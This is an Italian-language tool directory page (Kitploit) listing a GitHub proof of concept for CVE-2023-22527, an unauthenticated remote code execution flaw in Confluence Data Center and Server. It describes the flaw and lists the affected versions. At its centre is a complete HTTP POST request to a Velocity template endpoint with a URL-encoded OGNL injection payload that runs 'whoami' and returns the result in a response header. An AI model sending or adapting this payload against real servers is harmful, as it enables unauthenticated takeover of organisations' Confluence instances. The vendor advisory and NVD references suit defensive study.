Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-22527-POC — Una vulnerabilità di Remote Code Execution (RCE) di gravità critica (CVE-2023-22527) è stata scoperta in Confluence Server e Data Center. | Kitploit
Strumenti/GitHubGitHub/manh130902/cve-2023-22527-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubmanh130902/cve-2023-22527-poc

CVE-2023-22527-POC

Una vulnerabilità di Remote Code Execution (RCE) di gravità critica (CVE-2023-22527) è stata scoperta in Confluence Server e Data Center.

Vedi Repository
2232 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-22527

Descrizione

Una vulnerabilità di injection nei template sulle versioni precedenti di Confluence Data Center e Server consente a un attaccante non autenticato di ottenere RCE su un'istanza interessata. I clienti che utilizzano una versione vulnerabile devono agire immediatamente. Le versioni più recenti supportate di Confluence Data Center e Server non sono interessate da questa vulnerabilità, poiché è stata mitigata durante i regolari aggiornamenti di versione. Tuttavia, Atlassian raccomanda ai clienti di installare l'ultima versione per proteggere le proprie istanze da vulnerabilità non critiche descritte nel bollettino di sicurezza di gennaio di Atlassian.

ProdottoVersioni interessate
Confluence Data Center e Server8.0.x
8.2.x
8.3.x
8.4.x
8.5.0-8.5.3

POC

root@kitploit:~
POST /template/aui/text-inline.vm HTTP/1.1
Host: {HOST_NAME}
Content-Type: application/x-www-form-urlencoded
Connection: close

label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29

image

Riferimento

https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html

https://nvd.nist.gov/vuln/detail/CVE-2023-22527

Scarica lo strumento